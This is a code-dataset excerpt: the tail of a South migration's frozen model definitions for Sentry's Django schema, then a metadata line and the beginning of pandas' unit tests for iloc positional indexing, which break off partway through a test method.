'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'sentry.accessgroup': {
'Meta': {'unique_together': "(('team', 'name'),)", 'object_name': 'AccessGroup'},
'data': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'managed': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'members': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.User']", 'symmetrical': 'False'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'projects': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['sentry.Project']", 'symmetrical': 'False'}),
'team': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Team']"}),
'type': ('django.db.models.fields.IntegerField', [], {'default': '50'})
},
'sentry.activity': {
'Meta': {'object_name': 'Activity'},
'data': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'datetime': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'event': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Event']", 'null': 'True'}),
'group': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Group']", 'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'ident': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Project']"}),
'type': ('django.db.models.fields.PositiveIntegerField', [], {}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'null': 'True'})
},
'sentry.affecteduserbygroup': {
'Meta': {'unique_together': "(('project', 'tuser', 'group'),)", 'object_name': 'AffectedUserByGroup'},
'first_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'group': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Group']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'ident': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Project']"}),
'times_seen': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'tuser': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.TrackedUser']", 'null': 'True'})
},
'sentry.event': {
'Meta': {'unique_together': "(('project', 'event_id'),)", 'object_name': 'Event', 'db_table': "'sentry_message'"},
'checksum': ('django.db.models.fields.CharField', [], {'max_length': '32', 'db_index': 'True'}),
'culprit': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'db_column': "'view'", 'blank': 'True'}),
'data': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'datetime': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'event_id': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True', 'db_column': "'message_id'"}),
'group': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'event_set'", 'null': 'True', 'to': "orm['sentry.Group']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'level': ('django.db.models.fields.PositiveIntegerField', [], {'default': '40', 'db_index': 'True', 'blank': 'True'}),
'logger': ('django.db.models.fields.CharField', [], {'default': "'root'", 'max_length': '64', 'db_index': 'True', 'blank': 'True'}),
'message': ('django.db.models.fields.TextField', [], {}),
'num_comments': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0', 'null': 'True'}),
'platform': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'server_name': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True', 'db_index': 'True'}),
'site': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True', 'db_index': 'True'}),
'time_spent': ('django.db.models.fields.FloatField', [], {'null': 'True'})
},
'sentry.filterkey': {
'Meta': {'unique_together': "(('project', 'key'),)", 'object_name': 'FilterKey'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Project']"})
},
'sentry.filtervalue': {
'Meta': {'unique_together': "(('project', 'key', 'value'),)", 'object_name': 'FilterValue'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'value': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
'sentry.group': {
'Meta': {'unique_together': "(('project', 'checksum'),)", 'object_name': 'Group', 'db_table': "'sentry_groupedmessage'"},
'active_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'db_index': 'True'}),
'checksum': ('django.db.models.fields.CharField', [], {'max_length': '32', 'db_index': 'True'}),
'culprit': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'db_column': "'view'", 'blank': 'True'}),
'data': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'first_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_public': ('django.db.models.fields.NullBooleanField', [], {'default': 'False', 'null': 'True', 'blank': 'True'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'level': ('django.db.models.fields.PositiveIntegerField', [], {'default': '40', 'db_index': 'True', 'blank': 'True'}),
'logger': ('django.db.models.fields.CharField', [], {'default': "'root'", 'max_length': '64', 'db_index': 'True', 'blank': 'True'}),
'message': ('django.db.models.fields.TextField', [], {}),
'num_comments': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0', 'null': 'True'}),
'platform': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'resolved_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'db_index': 'True'}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'status': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0', 'db_index': 'True'}),
'time_spent_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'time_spent_total': ('django.db.models.fields.FloatField', [], {'default': '0'}),
'times_seen': ('django.db.models.fields.PositiveIntegerField', [], {'default': '1', 'db_index': 'True'}),
'users_seen': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0', 'db_index': 'True'})
},
'sentry.groupbookmark': {
'Meta': {'unique_together': "(('project', 'user', 'group'),)", 'object_name': 'GroupBookmark'},
'group': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'bookmark_set'", 'to': "orm['sentry.Group']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'bookmark_set'", 'to': "orm['sentry.Project']"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'sentry_bookmark_set'", 'to': "orm['auth.User']"})
},
'sentry.groupcountbyminute': {
'Meta': {'unique_together': "(('project', 'group', 'date'),)", 'object_name': 'GroupCountByMinute', 'db_table': "'sentry_messagecountbyminute'"},
'date': ('django.db.models.fields.DateTimeField', [], {'db_index': 'True'}),
'group': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Group']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'time_spent_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'time_spent_total': ('django.db.models.fields.FloatField', [], {'default': '0'}),
'times_seen': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'})
},
'sentry.groupmeta': {
'Meta': {'unique_together': "(('group', 'key'),)", 'object_name': 'GroupMeta'},
'group': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Group']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'value': ('django.db.models.fields.TextField', [], {})
},
'sentry.grouptag': {
'Meta': {'unique_together': "(('project', 'key', 'value', 'group'),)", 'object_name': 'GroupTag', 'db_table': "'sentry_messagefiltervalue'"},
'first_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True', 'db_index': 'True'}),
'group': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Group']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True', 'db_index': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'times_seen': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'value': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
'sentry.lostpasswordhash': {
'Meta': {'object_name': 'LostPasswordHash'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'hash': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'unique': 'True'})
},
'sentry.messageindex': {
'Meta': {'unique_together': "(('column', 'value', 'object_id'),)", 'object_name': 'MessageIndex'},
'column': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'object_id': ('django.db.models.fields.PositiveIntegerField', [], {}),
'value': ('django.db.models.fields.CharField', [], {'max_length': '128'})
},
'sentry.option': {
'Meta': {'object_name': 'Option'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '64'}),
'value': ('picklefield.fields.PickledObjectField', [], {})
},
'sentry.pendingteammember': {
'Meta': {'unique_together': "(('team', 'email'),)", 'object_name': 'PendingTeamMember'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'team': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'pending_member_set'", 'to': "orm['sentry.Team']"}),
'type': ('django.db.models.fields.IntegerField', [], {'default': '50'})
},
'sentry.project': {
'Meta': {'unique_together': "(('team', 'slug'),)", 'object_name': 'Project'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'owner': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'sentry_owned_project_set'", 'null': 'True', 'to': "orm['auth.User']"}),
'platform': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True'}),
'public': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '50', 'null': 'True'}),
'status': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0', 'db_index': 'True'}),
'team': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Team']", 'null': 'True'})
},
'sentry.projectcountbyminute': {
'Meta': {'unique_together': "(('project', 'date'),)", 'object_name': 'ProjectCountByMinute'},
'date': ('django.db.models.fields.DateTimeField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'time_spent_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'time_spent_total': ('django.db.models.fields.FloatField', [], {'default': '0'}),
'times_seen': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'})
},
'sentry.projectkey': {
'Meta': {'object_name': 'ProjectKey'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'key_set'", 'to': "orm['sentry.Project']"}),
'public_key': ('django.db.models.fields.CharField', [], {'max_length': '32', 'unique': 'True', 'null': 'True'}),
'secret_key': ('django.db.models.fields.CharField', [], {'max_length': '32', 'unique': 'True', 'null': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'null': 'True'}),
'user_added': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'keys_added_set'", 'null': 'True', 'to': "orm['auth.User']"})
},
'sentry.projectoption': {
'Meta': {'unique_together': "(('project', 'key'),)", 'object_name': 'ProjectOption', 'db_table': "'sentry_projectoptions'"},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Project']"}),
'value': ('picklefield.fields.PickledObjectField', [], {})
},
'sentry.searchdocument': {
'Meta': {'unique_together': "(('project', 'group'),)", 'object_name': 'SearchDocument'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'date_changed': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'group': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Group']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Project']"}),
'status': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'total_events': ('django.db.models.fields.PositiveIntegerField', [], {'default': '1'})
},
'sentry.searchtoken': {
'Meta': {'unique_together': "(('document', 'field', 'token'),)", 'object_name': 'SearchToken'},
'document': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'token_set'", 'to': "orm['sentry.SearchDocument']"}),
'field': ('django.db.models.fields.CharField', [], {'default': "'text'", 'max_length': '64'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'times_seen': ('django.db.models.fields.PositiveIntegerField', [], {'default': '1'}),
'token': ('django.db.models.fields.CharField', [], {'max_length': '128'})
},
'sentry.team': {
'Meta': {'object_name': 'Team'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'members': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'team_memberships'", 'symmetrical': 'False', 'through': "orm['sentry.TeamMember']", 'to': "orm['auth.User']"}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'owner': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '50'})
},
'sentry.teammember': {
'Meta': {'unique_together': "(('team', 'user'),)", 'object_name': 'TeamMember'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'team': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'member_set'", 'to': "orm['sentry.Team']"}),
'type': ('django.db.models.fields.IntegerField', [], {'default': '50'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'sentry_teammember_set'", 'to': "orm['auth.User']"})
},
'sentry.trackeduser': {
'Meta': {'unique_together': "(('project', 'ident'),)", 'object_name': 'TrackedUser'},
'data': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'null': 'True'}),
'first_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['sentry.Group']", 'through': "orm['sentry.AffectedUserByGroup']", 'symmetrical': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'ident': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'num_events': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Project']"})
},
'sentry.useroption': {
'Meta': {'unique_together': "(('user', 'project', 'key'),)", 'object_name': 'UserOption'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"}),
'value': ('picklefield.fields.PickledObjectField', [], {})
}
}
complete_apps = ['sentry'] | bsd-3-clause | 607,920,004,678,667,900 | 79.549419 | 208 | 0.554244 | false |
kushalbhola/MyStuff | Practice/PythonApplication/env/Lib/site-packages/pandas/tests/indexing/test_iloc.py | 2 | 26763 | """ test positional based indexing with iloc """
from warnings import catch_warnings, filterwarnings, simplefilter
import numpy as np
import pytest
import pandas as pd
from pandas import DataFrame, Series, concat, date_range, isna
from pandas.api.types import is_scalar
from pandas.tests.indexing.common import Base
from pandas.util import testing as tm
class TestiLoc(Base):
def test_iloc_exceeds_bounds(self):
# GH6296
# iloc should allow indexers that exceed the bounds
df = DataFrame(np.random.random_sample((20, 5)), columns=list("ABCDE"))
# lists of positions should raise IndexError!
msg = "positional indexers are out-of-bounds"
with pytest.raises(IndexError, match=msg):
df.iloc[:, [0, 1, 2, 3, 4, 5]]
with pytest.raises(IndexError, match=msg):
df.iloc[[1, 30]]
with pytest.raises(IndexError, match=msg):
df.iloc[[1, -30]]
with pytest.raises(IndexError, match=msg):
df.iloc[[100]]
s = df["A"]
with pytest.raises(IndexError, match=msg):
s.iloc[[100]]
with pytest.raises(IndexError, match=msg):
s.iloc[[-100]]
# still raise on a single indexer
msg = "single positional indexer is out-of-bounds"
with pytest.raises(IndexError, match=msg):
df.iloc[30]
with pytest.raises(IndexError, match=msg):
df.iloc[-30]
# GH10779
# single positive/negative indexer exceeding Series bounds should raise
# an IndexError
with pytest.raises(IndexError, match=msg):
s.iloc[30]
with pytest.raises(IndexError, match=msg):
s.iloc[-30]
# slices are ok
result = df.iloc[:, 4:10] # 0 < start < len < stop
expected = df.iloc[:, 4:]
tm.assert_frame_equal(result, expected)
result = df.iloc[:, -4:-10] # stop < 0 < start < len
expected = df.iloc[:, :0]
tm.assert_frame_equal(result, expected)
result = df.iloc[:, 10:4:-1] # 0 < stop < len < start (down)
expected = df.iloc[:, :4:-1]
tm.assert_frame_equal(result, expected)
result = df.iloc[:, 4:-10:-1] # stop < 0 < start < len (down)
expected = df.iloc[:, 4::-1]
tm.assert_frame_equal(result, expected)
result = df.iloc[:, -10:4] # start < 0 < stop < len
expected = df.iloc[:, :4]
tm.assert_frame_equal(result, expected)
result = df.iloc[:, 10:4] # 0 < stop < len < start
expected = df.iloc[:, :0]
tm.assert_frame_equal(result, expected)
result = df.iloc[:, -10:-11:-1] # stop < start < 0 < len (down)
expected = df.iloc[:, :0]
tm.assert_frame_equal(result, expected)
result = df.iloc[:, 10:11] # 0 < len < start < stop
expected = df.iloc[:, :0]
tm.assert_frame_equal(result, expected)
# slice bounds exceeding is ok
result = s.iloc[18:30]
expected = s.iloc[18:]
tm.assert_series_equal(result, expected)
result = s.iloc[30:]
expected = s.iloc[:0]
tm.assert_series_equal(result, expected)
result = s.iloc[30::-1]
expected = s.iloc[::-1]
tm.assert_series_equal(result, expected)
# doc example
def check(result, expected):
str(result)
result.dtypes
tm.assert_frame_equal(result, expected)
dfl = DataFrame(np.random.randn(5, 2), columns=list("AB"))
check(dfl.iloc[:, 2:3], DataFrame(index=dfl.index))
check(dfl.iloc[:, 1:3], dfl.iloc[:, [1]])
check(dfl.iloc[4:6], dfl.iloc[[4]])
msg = "positional indexers are out-of-bounds"
with pytest.raises(IndexError, match=msg):
dfl.iloc[[4, 5, 6]]
msg = "single positional indexer is out-of-bounds"
with pytest.raises(IndexError, match=msg):
dfl.iloc[:, 4]
@pytest.mark.parametrize("index,columns", [(np.arange(20), list("ABCDE"))])
@pytest.mark.parametrize(
"index_vals,column_vals",
[
([slice(None), ["A", "D"]]),
(["1", "2"], slice(None)),
([pd.datetime(2019, 1, 1)], slice(None)),
],
)
def test_iloc_non_integer_raises(self, index, columns, index_vals, column_vals):
# GH 25753
df = DataFrame(
np.random.randn(len(index), len(columns)), index=index, columns=columns
)
msg = ".iloc requires numeric indexers, got"
with pytest.raises(IndexError, match=msg):
df.iloc[index_vals, column_vals]
def test_iloc_getitem_int(self):
# integer
self.check_result(
"integer", "iloc", 2, "ix", {0: 4, 1: 6, 2: 8}, typs=["ints", "uints"]
)
self.check_result(
"integer",
"iloc",
2,
"indexer",
2,
typs=["labels", "mixed", "ts", "floats", "empty"],
fails=IndexError,
)
def test_iloc_getitem_neg_int(self):
# neg integer
self.check_result(
"neg int", "iloc", -1, "ix", {0: 6, 1: 9, 2: 12}, typs=["ints", "uints"]
)
self.check_result(
"neg int",
"iloc",
-1,
"indexer",
-1,
typs=["labels", "mixed", "ts", "floats", "empty"],
fails=IndexError,
)
@pytest.mark.parametrize("dims", [1, 2])
def test_iloc_getitem_invalid_scalar(self, dims):
# GH 21982
if dims == 1:
s = Series(np.arange(10))
else:
s = DataFrame(np.arange(100).reshape(10, 10))
with pytest.raises(TypeError, match="Cannot index by location index"):
s.iloc["a"]
def test_iloc_array_not_mutating_negative_indices(self):
# GH 21867
array_with_neg_numbers = np.array([1, 2, -1])
array_copy = array_with_neg_numbers.copy()
df = pd.DataFrame(
{"A": [100, 101, 102], "B": [103, 104, 105], "C": [106, 107, 108]},
index=[1, 2, 3],
)
df.iloc[array_with_neg_numbers]
tm.assert_numpy_array_equal(array_with_neg_numbers, array_copy)
df.iloc[:, array_with_neg_numbers]
tm.assert_numpy_array_equal(array_with_neg_numbers, array_copy)
def test_iloc_getitem_list_int(self):
# list of ints
self.check_result(
"list int",
"iloc",
[0, 1, 2],
"ix",
{0: [0, 2, 4], 1: [0, 3, 6], 2: [0, 4, 8]},
typs=["ints", "uints"],
)
self.check_result(
"list int",
"iloc",
[2],
"ix",
{0: [4], 1: [6], 2: [8]},
typs=["ints", "uints"],
)
self.check_result(
"list int",
"iloc",
[0, 1, 2],
"indexer",
[0, 1, 2],
typs=["labels", "mixed", "ts", "floats", "empty"],
fails=IndexError,
)
# array of ints (GH5006), make sure that a single indexer is returning
# the correct type
self.check_result(
"array int",
"iloc",
np.array([0, 1, 2]),
"ix",
{0: [0, 2, 4], 1: [0, 3, 6], 2: [0, 4, 8]},
typs=["ints", "uints"],
)
self.check_result(
"array int",
"iloc",
np.array([2]),
"ix",
{0: [4], 1: [6], 2: [8]},
typs=["ints", "uints"],
)
self.check_result(
"array int",
"iloc",
np.array([0, 1, 2]),
"indexer",
[0, 1, 2],
typs=["labels", "mixed", "ts", "floats", "empty"],
fails=IndexError,
)
def test_iloc_getitem_neg_int_can_reach_first_index(self):
# GH10547 and GH10779
# negative integers should be able to reach index 0
df = DataFrame({"A": [2, 3, 5], "B": [7, 11, 13]})
s = df["A"]
expected = df.iloc[0]
result = df.iloc[-3]
tm.assert_series_equal(result, expected)
expected = df.iloc[[0]]
result = df.iloc[[-3]]
tm.assert_frame_equal(result, expected)
expected = s.iloc[0]
result = s.iloc[-3]
assert result == expected
expected = s.iloc[[0]]
result = s.iloc[[-3]]
tm.assert_series_equal(result, expected)
# check the length 1 Series case highlighted in GH10547
expected = Series(["a"], index=["A"])
result = expected.iloc[[-1]]
tm.assert_series_equal(result, expected)
def test_iloc_getitem_dups(self):
self.check_result(
"list int (dups)",
"iloc",
[0, 1, 1, 3],
"ix",
{0: [0, 2, 2, 6], 1: [0, 3, 3, 9]},
objs=["series", "frame"],
typs=["ints", "uints"],
)
# GH 6766
df1 = DataFrame([{"A": None, "B": 1}, {"A": 2, "B": 2}])
df2 = DataFrame([{"A": 3, "B": 3}, {"A": 4, "B": 4}])
df = concat([df1, df2], axis=1)
# cross-sectional indexing
result = df.iloc[0, 0]
assert isna(result)
result = df.iloc[0, :]
expected = Series([np.nan, 1, 3, 3], index=["A", "B", "A", "B"], name=0)
tm.assert_series_equal(result, expected)
def test_iloc_getitem_array(self):
# array like
s = Series(index=range(1, 4))
self.check_result(
"array like",
"iloc",
s.index,
"ix",
{0: [2, 4, 6], 1: [3, 6, 9], 2: [4, 8, 12]},
typs=["ints", "uints"],
)
def test_iloc_getitem_bool(self):
# boolean indexers
b = [True, False, True, False]
self.check_result("bool", "iloc", b, "ix", b, typs=["ints", "uints"])
self.check_result(
"bool",
"iloc",
b,
"ix",
b,
typs=["labels", "mixed", "ts", "floats", "empty"],
fails=IndexError,
)
@pytest.mark.parametrize("index", [[True, False], [True, False, True, False]])
def test_iloc_getitem_bool_diff_len(self, index):
# GH26658
s = Series([1, 2, 3])
with pytest.raises(
IndexError,
match=("Item wrong length {} instead of {}.".format(len(index), len(s))),
):
_ = s.iloc[index]
def test_iloc_getitem_slice(self):
# slices
self.check_result(
"slice",
"iloc",
slice(1, 3),
"ix",
{0: [2, 4], 1: [3, 6], 2: [4, 8]},
typs=["ints", "uints"],
)
self.check_result(
"slice",
"iloc",
slice(1, 3),
"indexer",
slice(1, 3),
typs=["labels", "mixed", "ts", "floats", "empty"],
fails=IndexError,
)
def test_iloc_getitem_slice_dups(self):
df1 = DataFrame(np.random.randn(10, 4), columns=["A", "A", "B", "B"])
df2 = DataFrame(
np.random.randint(0, 10, size=20).reshape(10, 2), columns=["A", "C"]
)
# axis=1
df = concat([df1, df2], axis=1)
tm.assert_frame_equal(df.iloc[:, :4], df1)
tm.assert_frame_equal(df.iloc[:, 4:], df2)
df = concat([df2, df1], axis=1)
tm.assert_frame_equal(df.iloc[:, :2], df2)
tm.assert_frame_equal(df.iloc[:, 2:], df1)
exp = concat([df2, df1.iloc[:, [0]]], axis=1)
tm.assert_frame_equal(df.iloc[:, 0:3], exp)
# axis=0
df = concat([df, df], axis=0)
tm.assert_frame_equal(df.iloc[0:10, :2], df2)
tm.assert_frame_equal(df.iloc[0:10, 2:], df1)
tm.assert_frame_equal(df.iloc[10:, :2], df2)
tm.assert_frame_equal(df.iloc[10:, 2:], df1)
def test_iloc_setitem(self):
df = self.frame_ints
df.iloc[1, 1] = 1
result = df.iloc[1, 1]
assert result == 1
df.iloc[:, 2:3] = 0
expected = df.iloc[:, 2:3]
result = df.iloc[:, 2:3]
tm.assert_frame_equal(result, expected)
# GH5771
s = Series(0, index=[4, 5, 6])
s.iloc[1:2] += 1
expected = Series([0, 1, 0], index=[4, 5, 6])
tm.assert_series_equal(s, expected)
def test_iloc_setitem_list(self):
# setitem with an iloc list
df = DataFrame(
np.arange(9).reshape((3, 3)), index=["A", "B", "C"], columns=["A", "B", "C"]
)
df.iloc[[0, 1], [1, 2]]
df.iloc[[0, 1], [1, 2]] += 100
expected = DataFrame(
np.array([0, 101, 102, 3, 104, 105, 6, 7, 8]).reshape((3, 3)),
index=["A", "B", "C"],
columns=["A", "B", "C"],
)
tm.assert_frame_equal(df, expected)
def test_iloc_setitem_pandas_object(self):
# GH 17193
s_orig = Series([0, 1, 2, 3])
expected = Series([0, -1, -2, 3])
s = s_orig.copy()
s.iloc[Series([1, 2])] = [-1, -2]
tm.assert_series_equal(s, expected)
s = s_orig.copy()
s.iloc[pd.Index([1, 2])] = [-1, -2]
tm.assert_series_equal(s, expected)
def test_iloc_setitem_dups(self):
# GH 6766
# iloc with a mask aligning from another iloc
df1 = DataFrame([{"A": None, "B": 1}, {"A": 2, "B": 2}])
df2 = DataFrame([{"A": 3, "B": 3}, {"A": 4, "B": 4}])
df = concat([df1, df2], axis=1)
expected = df.fillna(3)
expected["A"] = expected["A"].astype("float64")
inds = np.isnan(df.iloc[:, 0])
mask = inds[inds].index
df.iloc[mask, 0] = df.iloc[mask, 2]
tm.assert_frame_equal(df, expected)
# del a dup column across blocks
expected = DataFrame({0: [1, 2], 1: [3, 4]})
expected.columns = ["B", "B"]
del df["A"]
tm.assert_frame_equal(df, expected)
# assign back to self
df.iloc[[0, 1], [0, 1]] = df.iloc[[0, 1], [0, 1]]
tm.assert_frame_equal(df, expected)
# reversed x 2
df.iloc[[1, 0], [0, 1]] = df.iloc[[1, 0], [0, 1]].reset_index(drop=True)
